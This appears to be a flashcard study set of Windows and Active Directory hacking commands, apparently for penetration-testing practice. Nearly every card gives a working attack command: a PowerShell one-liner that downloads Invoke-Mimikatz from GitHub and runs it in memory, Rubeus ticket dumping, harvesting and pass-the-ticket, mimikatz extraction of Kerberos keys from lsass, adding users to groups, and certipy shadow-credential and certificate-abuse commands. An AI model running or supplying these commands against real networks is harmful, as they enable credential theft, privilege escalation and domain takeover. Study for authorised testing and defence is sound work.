Windows Hacking Commands Flashcards

(14 cards)

1
Q

Mimikatz fileless download powershell

A

(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1’) | IEX

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

How to dump kerberos tickets from memory?

A

Rubeus.exe dump

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

How to dump only TGTs from memory?

A

Rubeus.exe dump /tgt

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

How to use a ticket (pass the ticket)?

A

Rubeus.exe ptt /ticket:”C:\path\to\ticket.kirbi”

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

How to make a kerberos ticket from an NTLM hash?

A

Rubeus.exe asktgt /domain:[domain] /user:[user] /rc4:[hash] /ptt

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

How to create a fake logon session with rubeus?

A

Rubeus.exe createnetonly /program:”C:\Windows\System32\cmd.exe” /show

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

How to make a TGT with a key?

A

Rubeus.exe asktgt /domain:[domain] /user:[user] /aes256:[AES_KEY] /ptt

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

How to dump kerberos keys from lsass?

A

mimikatz.exe privilege::debug sekurlsa::ekeys exit

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

How to extract kerberos tickets from active users on a windows host?

A

Rubeus.exe harvest /interval:30 /nowrap

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Get groups of user AD

A

ldapsearch -x -H ldap://[ip] -D [authuser]@[domain] -w [authpass] -b DC=[domain],DC=[domain] ‘(sAMAccountName=[user])’ memberOf

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Whats the syntax of ldapsearch

A

ldapsearch, auth_method, ldap_url, auth_user, auth_pass, base, filter, attribute

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

how to add a user to a group AD

A

net rpc group addmem [group] [user] -U [domain]/[user]%[password] -S [dc]

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Add shadow creds to user AD

A

certipy shadow auto -username [user]@[domain] -p [pass] -account [target_user] -dc-ip [dc]

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Enumerate CA vulnerabilities (ESC)

A

certipy find -vulnerable -u [user]@[domain] -hashes [NT_hash] -dc-ip [dc]

How well did you know this?
1
Not at all
2
3
4
5
Perfectly